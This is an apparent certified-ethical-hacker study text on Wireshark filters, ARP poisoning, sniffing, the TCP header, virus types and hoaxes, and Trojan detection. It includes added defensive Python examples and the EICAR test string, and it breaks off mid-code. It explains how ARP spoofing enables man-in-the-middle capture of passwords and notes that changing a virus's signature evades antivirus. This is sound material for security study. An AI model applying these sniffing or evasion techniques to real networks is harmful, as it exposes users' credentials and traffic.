Wireshark is a freeware sniffer that can capture packets from a wired or wireless LAN connection. It is a very powerful tool which can provide network and upper layer protocol data captured on a network. Like a lot of other network programs, Wireshark uses the pcap network library to capture packets.

Wireshark was called Ethereal until 2006 when the main developer decided to change its name because of copyright reasons with the Ethereal name, which was registered by the company he decided to leave in 2006.

In Exercise 1 you installed and began capturing packets using Wireshark. To narrow down the amount of information gathered by Wireshark, you can use filters. These filters limit the amount of information captured or displayed.

Exercise 1: Create a Wireshark filter to capture only traffic to or from an IP address

Open Wireshark.

Click the active Network Interface to capture traffic.

Click Capture, then select filters.

Click the new button to create a new filter.

Name the new filter in the filter name field.

Type host <IP address> in the filter string field, replacing <IP address> with the address whose traffic you want to capture.

Click OK.

Select the capture menu and click start to begin the capture.

Repeat the above steps to create filters using the following strings:

net 192.168.0.0/24 To capture traffic to or from a range of IP addresses.

src net 192.168.0.0/24 To capture traffic from a range of IP addresses.

dst net 192.168.0.0/24 To capture traffic to a range of IP addresses.

port 53 To capture only DNS (port 53) traffic.

host www.example.com and not (port 80 or port 25) To capture non-HTTP and non-SMTP traffic on your server.

port not 53 and not arp To capture all except ARP and DNS traffic.

tcp portrange 1501-1549 To capture traffic within a range of ports.

not broadcast and not multicast To capture only unicast traffic. This is useful to get rid of noise on the network if you only want to see traffic to and from your machine.
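As an added illustration (example code written for this page, not Wireshark's or libpcap's), the following Python script evaluates a subset of the capture-filter grammar used in the list above against a handful of constructed packet records, so you can check which packets each filter string keeps. The packet records, the www.example.com lookup table and the MAC addresses are assumptions; in Wireshark the same string is compiled by libpcap into a BPF program and applied as packets arrive.

```python
"""Mini evaluator for Wireshark capture-filter strings (added example; not
Wireshark or libpcap code). It implements a small subset of the Berkeley
Packet Filter (BPF) grammar those filters use: host, net, port, portrange,
src/dst and tcp/udp/ip/arp qualifiers, broadcast, multicast, not/and/or
and parentheses. Packets are constructed records, and hostnames resolve
from a constructed table instead of DNS, so it runs offline."""
import ipaddress
import re

NAMES = {"www.example.com": "192.168.0.10"}   # constructed stand-in for DNS
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"

def _proto_ok(pkt, proto):
    if proto is None:
        return True
    return pkt["proto"] != "arp" if proto == "ip" else pkt["proto"] == proto

def _make_test(kw, value, direction, proto):
    """Predicate for one primitive such as 'src net 192.168.0.0/24'."""
    if kw == "host":
        addr = NAMES.get(value, value)
        src, dst = (lambda p: p["src_ip"] == addr), (lambda p: p["dst_ip"] == addr)
    elif kw == "net":
        net = ipaddress.ip_network(value, strict=False)
        src = lambda p: ipaddress.ip_address(p["src_ip"]) in net
        dst = lambda p: ipaddress.ip_address(p["dst_ip"]) in net
    elif kw in ("port", "portrange"):
        lo, hi = (int(x) for x in value.split("-")) if kw == "portrange" else (int(value),) * 2
        src = lambda p: p["src_port"] is not None and lo <= p["src_port"] <= hi
        dst = lambda p: p["dst_port"] is not None and lo <= p["dst_port"] <= hi
    else:
        raise ValueError("unknown primitive %r" % kw)
    side = {"src": src, "dst": dst, None: (lambda p: src(p) or dst(p))}[direction]
    return lambda p: _proto_ok(p, proto) and side(p)

class _Parser:
    """expr := term ('or' term)*; term := factor ('and' factor)*;
    factor := 'not' factor | '(' expr ')' | primitive  (not binds tightest)."""
    def __init__(self, text):
        self.tokens = re.findall(r"\(|\)|[^\s()]+", text)
        self.pos = 0
    def peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None
    def take(self):
        tok = self.peek()
        self.pos += 1
        return tok
    def parse(self):
        node = self.expr()
        if self.peek() is not None:
            raise ValueError("unexpected token %r" % self.peek())
        return node
    def expr(self):
        node = self.term()
        while self.peek() == "or":
            self.take()
            node = (lambda l, r: lambda p: l(p) or r(p))(node, self.term())
        return node
    def term(self):
        node = self.factor()
        while self.peek() == "and":
            self.take()
            node = (lambda l, r: lambda p: l(p) and r(p))(node, self.factor())
        return node
    def factor(self):
        if self.peek() == "not":
            self.take()
            inner = self.factor()
            return lambda p: not inner(p)
        if self.peek() == "(":
            self.take()
            inner = self.expr()
            if self.take() != ")":
                raise ValueError("missing ')'")
            return inner
        return self.primitive()
    def primitive(self):
        direction = self.take() if self.peek() in ("src", "dst") else None
        proto = self.take() if self.peek() in ("tcp", "udp", "ip", "arp") else None
        kw = self.peek()
        if kw in ("host", "net", "port", "portrange"):
            self.take()
            negate = self.peek() == "not"          # BPF also accepts 'port not 53'
            if negate:
                self.take()
            test = _make_test(kw, self.take(), direction, proto)
            return (lambda p: not test(p)) if negate else test
        if kw == "broadcast":
            self.take()
            return lambda p: p["dst_mac"] == BROADCAST_MAC
        if kw == "multicast":                       # Ethernet group bit, as libpcap tests it
            self.take()
            return lambda p: int(p["dst_mac"][:2], 16) & 1 == 1
        if proto is not None and direction is None:  # bare 'tcp', 'udp', 'arp'
            return lambda p: _proto_ok(p, proto)
        raise ValueError("cannot parse near %r" % kw)

def select(filter_text, packets):
    """Ids of the packets the capture filter would keep."""
    test = _Parser(filter_text).parse()
    return [p["id"] for p in packets if test(p)]

def _pkt(pid, proto, src_ip, dst_ip, dst_mac, src_port=None, dst_port=None):
    return {"id": pid, "proto": proto, "src_ip": src_ip, "dst_ip": dst_ip,
            "dst_mac": dst_mac, "src_port": src_port, "dst_port": dst_port}

PACKETS = [  # constructed sample traffic
    _pkt(1, "udp", "192.168.0.5", "192.168.0.1", "00:aa:bb:cc:dd:01", 51000, 53),   # DNS query
    _pkt(2, "tcp", "192.168.0.5", "192.168.0.10", "00:aa:bb:cc:dd:0a", 51001, 80),  # HTTP
    _pkt(3, "tcp", "10.0.0.7", "192.168.0.10", "00:aa:bb:cc:dd:0a", 1510, 22),      # SSH from off-net
    _pkt(4, "arp", "192.168.0.5", "192.168.0.1", BROADCAST_MAC),                     # ARP request
    _pkt(5, "udp", "192.168.0.5", "224.0.0.251", "01:00:5e:00:00:fb", 5353, 5353), # mDNS multicast
]
```

Two details of the real grammar are worth noticing in the code: not binds tighter than and, which binds tighter than or, so "host www.example.com and not (port 80 or port 25)" needs the parentheses; and libpcap accepts the negation after the keyword ("port not 53") as well as before it.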

Practice writing filters in Wireshark that capture only one type of protocol traffic or traffic from a specific source IP or MAC address. Use your PC's IP or MAC address to test that the filter is working.

It's important to understand how to create these filters before you attempt the CEH exam.

Because of the way Ethernet switches operate, it is more difficult to gather useful information when sniffing on a switched network. Since most modern networks have been upgraded from hub to switches, it takes a little more effort to sniff on a switched network. One of the ways to do that is to trick the switch into sending the data to the hackers' computer using ARP poisoning.

How ARP Works

ARP allows the network to translate IP addresses into MAC addresses. When one host using TCP/IP on a LAN tries to contact another, it needs the MAC address or hardware address of the host it's trying to reach. It first looks in its ARP cache to see if it already has the MAC address; if it doesn't, it broadcasts an ARP request asking, "Who has the IP address I'm looking for?" If the host that has that IP address hears the ARP query, it responds with its own MAC address, and a conversation can begin using TCP/IP.

ARP poisoning is a technique that's used to attack an Ethernet network and that may let an attacker sniff data frames on a switched LAN or stop the traffic altogether. ARP poisoning utilizes ARP spoofing, where the purpose is to send fake, or spoofed, ARP messages to an Ethernet LAN. These frames contain false MAC addresses that confuse network devices such as network switches. As a result, frames intended for one machine can be mistakenly sent to another (allowing the packets to be sniffed) or to an unreachable host (a denial-of-service, or DoS, attack). ARP spoofing can also be used in a man-in-the-middle attack, in which all traffic is forwarded through a host by means of ARP spoofing and analyzed for passwords and other information.

ARP Spoofing and Poisoning Countermeasures

To prevent ARP spoofing, permanently add the MAC address of the gateway to the ARP cache on a system. You can do this on a Windows system by using the arp -s command at the command line and appending the gateway's IP and MAC addresses. Doing so prevents a hacker from overwriting the ARP cache entry to perform ARP spoofing on the system, but it can be difficult to manage in a large environment because of the number of systems. In an enterprise environment, port-based security can be enabled on a switch to allow only one MAC address per switch port.
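The following Python example is added here to show both halves of the point above from the defender's side; it is not code from the page or from any product. It replays a constructed list of ARP replies, raises alerts when a reply contradicts the trusted gateway binding (the binding a static arp -s entry pins), when an IP's advertised MAC changes, or when one MAC claims several IPs, and it models a host cache in which static entries are never overwritten. The gateway address, MAC addresses and timestamps are assumptions.

```python
"""ARP poisoning detection and the static-entry countermeasure (added
example; not from the page or any vendor). Replies are constructed, not
captured; in practice they would come from a capture filtered on 'arp'."""
from collections import defaultdict

GATEWAY_IP = "192.168.0.1"                          # assumption: this LAN's gateway
STATIC_ENTRIES = {GATEWAY_IP: "00:aa:bb:cc:dd:01"}  # constructed trusted binding

# Constructed ARP replies: (seconds, sender IP, sender MAC)
ARP_REPLIES = [
    (0, "192.168.0.1", "00:aa:bb:cc:dd:01"),   # genuine gateway reply
    (1, "192.168.0.5", "00:11:22:33:44:55"),   # workstation .5
    (2, "192.168.0.1", "00:11:22:33:44:55"),   # gateway IP now claimed by .5's MAC
    (3, "192.168.0.7", "00:11:22:33:44:55"),   # the same MAC also claims .7
]


def analyze(replies, trusted):
    """Return (time, kind, ip, mac) alerts for suspicious ARP replies."""
    alerts = []
    advertised = {}                   # ip -> MAC last seen claiming it
    ips_per_mac = defaultdict(set)    # mac -> every IP it has claimed
    for t, ip, mac in replies:
        mac = mac.lower()
        if ip in trusted and trusted[ip].lower() != mac:
            alerts.append((t, "trusted-binding-conflict", ip, mac))
        elif advertised.get(ip, mac) != mac:
            alerts.append((t, "ip-mac-changed", ip, mac))
        advertised[ip] = mac
        ips_per_mac[mac].add(ip)
        if len(ips_per_mac[mac]) > 1:
            # One NIC answering for several IPs is what a host poisoning
            # both ends of a conversation looks like on the wire.
            alerts.append((t, "mac-claims-multiple-ips", ip, mac))
    return alerts


def build_cache(replies, static):
    """Model of a host's ARP cache: static (arp -s) entries are never
    replaced by replies, so the spoofed gateway mapping is ignored."""
    cache = {ip: mac.lower() for ip, mac in static.items()}
    for _, ip, mac in replies:
        if ip not in static:
            cache[ip] = mac.lower()
    return cache


if __name__ == "__main__":
    for alert in analyze(ARP_REPLIES, STATIC_ENTRIES):
        print(alert)
    print("gateway in cache with static entry:", build_cache(ARP_REPLIES, STATIC_ENTRIES)[GATEWAY_IP])
    print("gateway in cache without it:      ", build_cache(ARP_REPLIES, {})[GATEWAY_IP])
```

The "trusted-binding-conflict" alert is the one a static entry protects against on a single host; the other two need no prior knowledge of the gateway and are the kind of check a network-wide monitor would run, which is why they matter in the large environments where maintaining static entries on every system is impractical.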

Click the Start button next to the interface that shows packets being sent and received. If you have multiple interfaces with packet activity, choose one of them—preferably the interface with the most activity.

Click on a packet to analyze that single packet. The detailed headers will be displayed beneath the packet capture screen.

Expand each header (IP, TCP) of a packet and identify the address information.

This exercise will provide much more network traffic if performed on a hub rather than a switch. A wireless network can be used, as a wireless LAN is a shared network segment similar to how a hub operates.

Hacking Tools

Wireshark is a freeware sniffer that can capture packets from a wired or wireless LAN connection. The software was previously called Ethereal. Wireshark is a common and popular program because it is free, but it has some drawbacks. An untrained user may find it difficult to write filters in Wireshark to capture only certain types of traffic.

Snort is an intrusion detection system (IDS) that also has sniffer capabilities. It can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, Common Gateway Interface (CGI) attacks, Server Message Block (SMB) probes, and OS fingerprinting attempts.

WinDump is the Windows version of tcpdump, the command-line network analyzer for Unix. WinDump is fully compatible with tcpdump and can be used to watch, diagnose, and save to disk network traffic according to various rules.

EtherPeek is a great sniffer for wired networks with extensive filtering and TCP/IP conversation tracking capabilities. The latest version of EtherPeek has been renamed OmniPeek.

Iris is an advanced data- and network-traffic analyzer that collects, stores, organizes, and reports all data traffic on a network. Unlike other network sniffers, Iris is able to reconstruct network traffic, such as graphics, documents, and emails including attachments.

Sniffer software works by capturing packets not destined for the sniffer system's MAC address but rather for a target's destination MAC address. This is known as promiscuous mode. Normally, a system on the network reads and responds only to traffic sent directly to its MAC address. However, many hacking tools change the system's NIC to promiscuous mode. In promiscuous mode, a NIC reads all traffic and sends it to the sniffer for processing. Promiscuous mode is enabled on a network card with the installation of special driver software. Many of the hacking tools for sniffing include a promiscuous-mode driver to facilitate this process. Not all Windows drivers support promiscuous mode, so when using hacking tools ensure that the driver will support the necessary mode.

Any protocols that don't encrypt data are susceptible to sniffing. Protocols such as HTTP, POP3, Simple Network Management Protocol (SNMP), and FTP are most commonly captured using a sniffer and viewed by a hacker to gather valuable information such as usernames and passwords.

There are two different types of sniffing: passive and active. Passive sniffing involves listening and capturing traffic, and is useful in a network connected by hubs; active sniffing involves launching an Address Resolution Protocol (ARP) spoofing or traffic-flooding attack against a switch in order to capture traffic. As the names indicate, active sniffing is detectable but passive sniffing is not detectable.

In networks that use hubs or wireless media to connect systems, all hosts on the network can see all traffic; therefore, a passive packet sniffer can capture traffic going to and from all hosts connected via the hub. A switched network operates differently. The switch looks at the data sent to it and tries to forward packets to their intended recipients based on MAC address. The switch maintains a MAC table of all the systems and the port numbers to which they're connected. This enables the switch to segment the network traffic and send traffic only to the correct destination MAC addresses. A switched network has greatly improved throughput and is more secure than a shared network connected via hubs.

Another way to sniff data through a switch is to use a span port or port mirroring to enable all data sent to a physical switch port to be duplicated to another port. In many cases, span ports are used by network administrators to monitor traffic for legitimate purposes.

All host-to-host network communication is based upon the TCP/IP data communications model. The TCP/IP model is a four-layer model that maps to the older seven-layer OSI model. Most applications use the TCP/IP suite for host-to-host data communications. See Figure 1.

Figure 1: TCP/IP Model

In normal network operations, the application layer data is encapsulated and a header containing address information is added to the beginning of the data. An IP header containing source and destination IP addresses is added to the data, as well as a MAC header containing source and destination MAC addresses. IP addresses are used to route traffic to the appropriate IP network, and the MAC addresses ensure the data is sent to the correct host on the destination IP network. In this manner, traffic is sent from source host to destination host across the Internet and delivery to the correct host is ensured. The postal system works much the same way. Mail is routed to the appropriate area using the zip code, and then the mail is delivered within the zip code to the street and house number. The IP address is similar to the zip code that delivers mail to the regional area, and the street and house numbers are like the MAC address of that exact station on the network.

The address system ensures accurate delivery to the receiver. In normal network operations, a host should not receive data intended for another host as the data packet should only be received by the intended receiver. Simply said, the data should only be received by the station with the correct IP and MAC address. However, we know that sniffers do receive data not intended for them.

Real World Scenario: What Does Mail Delivery Have to Do with Hacking?

In the real world, sometimes mail is not delivered to the intended receiver. I'm sure you have all opened your mailbox to discover an envelope addressed to your neighbor or someone who used to live at your address. This happens on a fairly regular basis at my house. Most people will just leave the mail in the box for the postal carrier to redeliver or physically take the envelope to a neighbor. This same type of situation can occur in computer networking, where application layer data does not reach its intended recipient because of a delivery error or other network fault.

Another cause of mail not being received by the intended recipient is that someone is performing reconnaissance and watching your mailbox. Let's assume you are not home and the postal carrier delivers your mail to the mailbox. Someone watching the mailbox from down the street or a nearby building could wait for the mail to be delivered and then take the mail, or just a particular envelope, out of the box. This would be especially effective if the hacker had performed some reconnaissance and knew what time each day the mail was delivered. The hacker could then examine and read the information in the envelope and, if they were trying to cover their tracks, simply reseal the envelope and put it back in the mailbox.

Sniffing data on a network occurs in much the same way. Data is intercepted, read, and either sent on to the intended recipient or just discarded.

In addition to understanding network addresses, it is also important to understand the format of the TCP Header. Figure 2 shows the TCP Header format.

Figure 2: TCP Header Format

The TCP Header is comprised of the following fields:

Source Port: 16 bits The source port number.

Destination Port: 16 bits The destination port number.

Sequence Number: 32 bits The sequence number of the first data octet in this segment (except when SYN is present). If SYN is present the sequence number is the initial sequence number (ISN) and the first data octet is ISN+1.

Acknowledgment Number: 32 bits If the ACK control bit is set this field contains the value of the next sequence number the sender of the segment is expecting to receive.

Data Offset: 4 bits The number of 32-bit words in the TCP header. This indicates where the data begins.

Reserved: 6 bits Reserved for future use. Must be zero.

Control Bits: 6 bits

URG: Urgent Pointer field significant

ACK: Acknowledgment field significant

PSH: Push Function

RST: Reset the connection

SYN: Synchronize sequence numbers

FIN: No more data from sender

Window: 16 bits The number of data octets beginning with the one indicated in the acknowledgment field which the sender of this segment is willing to accept.

Checksum: 16 bits The checksum field is a computation of all fields to ensure all data was received and the data was not modified in transit.

Urgent Pointer: 16 bits This field communicates the current value of the urgent pointer as a positive offset from the sequence number in this segment. The urgent pointer points to the sequence number of the octet following the urgent data. This field is only interpreted in segments with the URG control bit set.

Options: variable Options may occupy space at the end of the TCP header and are a multiple of 8 bits in length.

When referring to the length of the fields in the TCP header, 8 bits make up a single byte. A nibble is 4 bits, half a byte, and a word is larger than a byte; the Data Offset field, for example, counts 32-bit (4-byte) words.
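To make the field layout above concrete, here is an added Python example (not from the page) that unpacks the fixed 20-byte TCP header, decodes the six control bits, converts the Data Offset word count into a byte length, and verifies the checksum. The checksum is computed over an IPv4 pseudo-header (source and destination address, protocol number 6 and TCP length) plus the header and payload, which is why the verifier needs the IP addresses. The segment is constructed by build_segment, and the addresses and port numbers in it are assumptions.

```python
"""TCP header decoder and checksum check (added example, not from the page).
Field layout follows the RFC 793 description above: 4-bit data offset,
6 reserved bits, 6 control bits. The segment is constructed, not captured."""
import socket
import struct

FLAG_NAMES = ("FIN", "SYN", "RST", "PSH", "ACK", "URG")   # bit 0 .. bit 5


def ones_complement_sum(data):
    """16-bit one's complement sum used by the IP, TCP and UDP checksums."""
    if len(data) % 2:
        data += b"\x00"                       # odd length is padded with a zero octet
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                        # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return total


def tcp_checksum(src_ip, dst_ip, segment):
    """Checksum of a segment whose own checksum field is already zero."""
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, 6, len(segment)))   # zero, protocol 6, TCP length
    return (~ones_complement_sum(pseudo + segment)) & 0xFFFF


def parse_tcp_header(segment):
    if len(segment) < 20:
        raise ValueError("segment shorter than the 20-byte fixed header")
    (src_port, dst_port, seq, ack, off_res_flags,
     window, checksum, urgent) = struct.unpack("!HHIIHHHH", segment[:20])
    data_offset = off_res_flags >> 12                   # header length in 32-bit words
    header_len = data_offset * 4
    if header_len < 20 or header_len > len(segment):
        raise ValueError("data offset %d words is invalid for this segment" % data_offset)
    flag_bits = off_res_flags & 0x3F
    return {
        "src_port": src_port, "dst_port": dst_port, "seq": seq, "ack": ack,
        "data_offset_words": data_offset, "header_length_bytes": header_len,
        "reserved": (off_res_flags >> 6) & 0x3F,
        "flags": [n for i, n in enumerate(FLAG_NAMES) if flag_bits & (1 << i)],
        "window": window, "checksum": checksum, "urgent_pointer": urgent,
        "options": segment[20:header_len],              # present when data offset > 5
        "payload": segment[header_len:],
    }


def verify_checksum(src_ip, dst_ip, segment):
    """Recompute the checksum with the field zeroed and compare to the stored one."""
    stored = struct.unpack("!H", segment[16:18])[0]
    zeroed = segment[:16] + b"\x00\x00" + segment[18:]
    return tcp_checksum(src_ip, dst_ip, zeroed) == stored


def build_segment(src_ip, dst_ip, src_port, dst_port, seq, ack, flags,
                  window=65535, payload=b""):
    """Constructed segment with a valid checksum (data offset 5, no options)."""
    header = struct.pack("!HHIIHHHH", src_port, dst_port, seq, ack,
                         (5 << 12) | (flags & 0x3F), window, 0, 0)
    csum = tcp_checksum(src_ip, dst_ip, header + payload)
    return header[:16] + struct.pack("!H", csum) + header[18:] + payload


if __name__ == "__main__":
    seg = build_segment("192.168.0.5", "192.168.0.10", 51000, 80, 1000, 0, 0x02)  # a SYN
    print(parse_tcp_header(seg))
    print("checksum valid:", verify_checksum("192.168.0.5", "192.168.0.10", seg))
```

The checksum detects accidental corruption only; anyone who can alter a segment in transit can recompute it, so integrity against a sniffer that also injects traffic comes from encryption and authentication at a higher layer, not from this field.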

In the next section we will explore how a hacking tool manipulates normal network operations in order to capture traffic on a host that is not the intended receiver.

A test virus can be created by typing the following code in Notepad and saving the file as EICAR.COM. Your antivirus program should respond when you attempt to open, run, or copy it.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Worms can be prevented from infecting systems in much the same way as viruses. Worms can be more difficult to stop because they spread on their own, meaning they do not need user intervention to install and continue to propagate the malware. Worms can be detected with the use of antimalware software that contains definitions for worms. Worms, most importantly, need to be stopped from spreading. In order to do this, an administrator may need to take systems offline. The best practice for cleaning worms off networked systems is to first remove the computer from the network and then run the security software to clean the worm.

Viruses are classified according to two factors: what they infect and how they infect. A virus can infect the following components of a system:

System sectors

Files

Macros (such as Microsoft Word macros)

Companion files (supporting system files like DLL and INI files)

Disk clusters

Batch files (BAT files)

Source code

A virus infects through interaction with an outside system. Viruses need to be carried by another executable program. By attaching itself to the benign executable a virus can spread fairly quickly as users or the system runs the executable. Viruses are categorized according to their infection technique, as follows:

Polymorphic Viruses These viruses encrypt the code in a different way with each infection and can change to different forms to try to evade detection.

Stealth Viruses These viruses hide the normal virus characteristics, such as modifying the original time and date stamp of the file so as to prevent the virus from being noticed as a new file on the system.

Fast and Slow Infectors These viruses can evade detection by infecting very quickly or very slowly. This can sometimes allow the program to infect a system without detection by an antivirus program.

Sparse Infectors These viruses infect only a few systems or applications.

Tunneling Viruses These viruses are sent via a different protocol or encrypted to prevent detection or allow it to pass through a firewall.

Camouflage Viruses These viruses appear to be another program.

NTFS and Active Directory Viruses These viruses specifically attack the NT file system or Active Directory on Windows systems.

An attacker can write a custom script or virus that won't be detected by antivirus programs. Because virus detection and removal is based on a signature of the program, a hacker just needs to change the signature or look of the virus to prevent detection. The virus signature or definition is the way an antivirus program is able to determine if a system is infected by a virus. Until the virus is detected and antivirus companies have a chance to update virus definitions, the virus goes undetected. Additional time may elapse before a user updates the antivirus program, allowing the system to be vulnerable to an infection. This allows an attacker to evade antivirus detection and removal for a period of time. A critical countermeasure to virus infection is to maintain up-to-date virus definitions in an antivirus program.
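The following Python example is added to show what a signature match and a stale definition set look like in code; it is not the page's or any vendor's scanner. It uses the EICAR test file quoted earlier as the known sample, carries two signature types (an exact SHA-256 digest and a byte pattern) and reports when the definitions are older than a threshold, which is the countermeasure the paragraph above ends on. The other file contents, the definition date and the seven-day threshold are constructed assumptions.

```python
"""Signature-based scanning demonstrated with the EICAR test file (added
example; not from the page or any antivirus vendor). File contents other
than EICAR, the definition date and the age threshold are constructed."""
import hashlib
from datetime import date

EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

DEFINITIONS = {
    "released": date(2012, 1, 15),          # constructed definition date
    # Exact-match signature. Vendors ship the digest; it is derived from the
    # reference sample here so the example stays self-contained.
    "hashes": {hashlib.sha256(EICAR).hexdigest(): "EICAR-Test-File (hash)"},
    # Content pattern: still matches when the file grows or is re-saved.
    "patterns": {b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE": "EICAR-Test-File (pattern)"},
}

# Constructed files: a clean document, EICAR exactly, and EICAR as saved by
# an editor that appended a line ending (trailing whitespace is permitted by
# the EICAR specification, so this is still a valid test file).
FILES = {
    "notes.txt": b"quarterly report draft\n",
    "EICAR.COM": EICAR,
    "EICAR_notepad.COM": EICAR + b"\r\n",
}


def scan_bytes(data, definitions):
    """Return the names of every signature that matches the data."""
    hits = []
    digest = hashlib.sha256(data).hexdigest()
    if digest in definitions["hashes"]:
        hits.append(definitions["hashes"][digest])
    for pattern, name in definitions["patterns"].items():
        if pattern in data:
            hits.append(name)
    return hits


def definitions_stale(definitions, today, max_age_days=7):
    """True when the definition set is older than the allowed age."""
    if isinstance(today, str):
        today = date.fromisoformat(today)
    return (today - definitions["released"]).days > max_age_days


def scan_files(files, definitions, today):
    """Scan every file and flag stale definitions in the same report."""
    results = {name: scan_bytes(data, definitions) for name, data in files.items()}
    return {
        "stale_definitions": definitions_stale(definitions, today),
        "results": results,
        "infected": sorted(name for name, hits in results.items() if hits),
    }


if __name__ == "__main__":
    report = scan_files(FILES, DEFINITIONS, date.today().isoformat())
    print("definitions stale:", report["stale_definitions"])
    for name, hits in report["results"].items():
        print(name, "->", hits or "clean")
```

The re-saved copy is the instructive case: its digest no longer matches, but the content pattern does, which is why definition sets combine whole-file hashes with content signatures rather than relying on hashes alone. A stale flag in the report is as important as a hit, since a scanner with old definitions reports "clean" for anything released after its last update.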

One of the most longstanding viruses was the Melissa virus, which spread through Microsoft Word Macros. Melissa infected many users by attaching to the Word doc and then when the file was copied or emailed, the virus spread along with the file.

Virus Hoaxes are emails sent to users usually with a warning about a virus attack. The Virus Hoax emails usually make outlandish claims about the damage that will be caused by a virus and then offer to download a remediation patch from well-known companies such as Microsoft or Norton. Other Hoaxes recommend users delete certain critical systems files in order to remove the virus. Of course, should a user follow these recommendations they will most certainly have negative consequences. Some of the most common virus hoaxes are shown in Table 5.1:

Name: Antichrist
Alias: (not given)
Description: This is a hoax that warned about a supposed virus discovered by Microsoft and McAfee named "Antichrist", telling the user that it is installed via an email with the subject line "SURPRISE?!!!!!!!!!!", after which it destroys the zeroth sector of the hard disk, rendering it unusable.

Name: Budweiser Frogs
Alias: BUDSAVER.EXE
Description: Supposedly would erase the user's hard drive and steal the user's screen name and password.

Name: Goodtimes virus
Alias: (none)
Description: Warnings about a computer virus named "Good Times" began being passed around among Internet users in 1994. The Goodtimes virus was supposedly transmitted via an email bearing the subject header "Good Times" or "Goodtimes," hence the virus's name, and the warning recommended deleting any such email unread. The virus described in the warnings did not exist, but the warnings themselves were, in effect, virus-like.

Name: Invitation attachment (computer virus hoax)
Alias: Allright now/I'm just sayin
Description: The invitation virus hoax involved an email spam in 2006 that advised computer users to delete any email with an attachment that stated "invitation" because it was a computer virus.

Name: Jdbgmgr.exe
Alias: bear.a
Description: The jdbgmgr.exe virus hoax involved an email spam in 2002 that advised computer users to delete a file named jdbgmgr.exe because it was a computer virus. jdbgmgr.exe, which had a little teddy bear-like icon (The Microsoft Bear), was actually a valid Microsoft Windows file, the Debugger Registrar for Java (also known as Java Debug Manager, hence jdbgmgr).

Name: Life is beautiful
Alias: Life is wonderful
Description: The hoax was spread through the Internet around January 2001 in Brazil. It told of a virus attached to an email, which was spread around the Internet. The attached file was supposedly called "Life is beautiful.pps" or "La vita è bella.pps".

Name: Olympic Torch
Alias: Postcard or Postcard from Hallmark
Description: Olympic Torch is a computer virus hoax sent out by email. The hoax emails first appeared in February 2006. The "virus" referred to by the email does not actually exist. The hoax email warns recipients of a recent outbreak of "Olympic Torch" viruses, contained in emails titled "Invitation," which erase the hard disk of the user's computer when opened.

Name: SULFNBK.EXE Warning
Alias: none
Description: SULFNBK.EXE (short for Setup Utility for Long File Name Backup) is an internal component of the Microsoft Windows operating system (in Windows 98 and Windows Me) for restoring long file names. The component became famous in the early 2000s as the subject of an email hoax. The hoax claimed that SULFNBK.EXE was a virus, and contained instructions to locate and delete the file. While the instructions worked, they were needless and (in some rare cases, for example, when the long file names are damaged and need to be restored) could cause disruptions, as SULFNBK.EXE is not a virus but an operating system component.

To find out whether an email regarding a virus is legitimate, review the list of virus hoaxes on the website home.mcafee.com/virusinfo.

Windows 2003 includes a feature called Windows File Protection (WFP) that prevents the replacement of protected files. WFP checks the file integrity when an attempt is made to overwrite a SYS, DLL, OCX, TTF, or EXE file. This ensures that only Microsoft-verified files are used to replace system files.

Another tool, sigverif, checks to see what files Microsoft has digitally signed on a system. In Exercise 1, we will use this tool.

Exercise 1: Signature Verification

We will run sigverif, a signature verification checker, and compare the results to the currently running processes in Task Manager:

Press Ctrl+Alt+Del and select Start Task Manager.

Click the Processes tab. Note any unusual processes and the amount of CPU time they are using. Any processes using a consistently high percentage of CPU time may indicate a virus or Trojan infection.

Click the Performance tab in Task Manager to view the current CPU usage.

Click Start, then click Run.

Type sigverif, and click Start.

In the sigverif program, choose Advanced to see the signature verification report.

Click the View Log button to see the report.

System File Checker is another command line–based tool used to check whether a Trojan program has replaced files. If System File Checker detects that a file has been overwritten, it retrieves a known good file from the Windows\system32\dllcache folder and overwrites the unverified file. The command to run the System File Checker is sfc /scannow.

Most commercial antivirus programs have anti-Trojan capabilities as well as spyware detection and removal functionality. These tools can automatically scan hard drives on startup to detect backdoor and Trojan programs before they can cause damage. Once a system is infected, it's more difficult to clean, but you can do so with commercially available tools.

The security software works by having known signatures of malware, such as Trojans and viruses. The repair for the malware is made through the use of definitions of the malware. When installing and using any personal security software or antivirus and anti-Trojan software, you must make sure that the software has all the current definitions. To ensure the latest patches and fixes are available, you should connect the system to the Internet so the software can continually update the malware definitions and fixes.

It's important to use commercial applications to clean a system instead of freeware tools, because many freeware removal tools can further infect the system. In addition, a lot of commercial security software includes an intrusion detection component that will perform port monitoring and can identify ports that have been opened or files that have changed.

The key to preventing Trojans and backdoors from being installed on a system is to educate users not to install applications downloaded from the Internet or open email attachments from parties they don't know. Many system administrators don't give users the system permissions necessary to install programs on their system for that very reason. Proper use of Internet technologies should be included in regular employee security awareness training.

Port-Monitoring and Trojan-Detection Tools

Fport reports all open TCP/IP and UDP ports and maps them to the owning application. You can use fport to quickly identify unknown open ports and their associated applications.

TCPView is a Windows program that shows detailed listings of all TCP and UDP endpoints on the system, including the local and remote addresses and state of TCP connections. When TCPView runs, it enumerates all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions.

PrcView is a process viewer utility that displays detailed information about processes running under Windows. PrcView comes with a command-line version you can use to write scripts that check whether a process is running and, if so, kill it.

Inzider is a useful tool that lists processes in the Windows system and the ports on which each one listens. Inzider may pick up some Trojans. For instance, BackOrifice injects itself into other processes, so it isn't visible in the Task Manager as a separate process, but it does have an open port that it listens on.
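As an added example (not code from fport, TCPView, PrcView or Inzider), the Python script below performs the review those tools support: it takes an endpoint table of the kind netstat -ano or TCPView would list (protocol, local address, state, owning PID and process name), compares listening sockets against an allow list of expected listeners, and flags a command shell that owns a network endpoint. The allow list, the endpoint rows, the process names and the ports are all constructed sample values.

```python
"""Port-to-process review in the spirit of fport and TCPView (added example;
not from those tools). Endpoint rows, the allow list and process names are
constructed; in practice the rows come from 'netstat -ano' or TCPView."""

EXPECTED_LISTENERS = {       # assumption: this host's approved listeners
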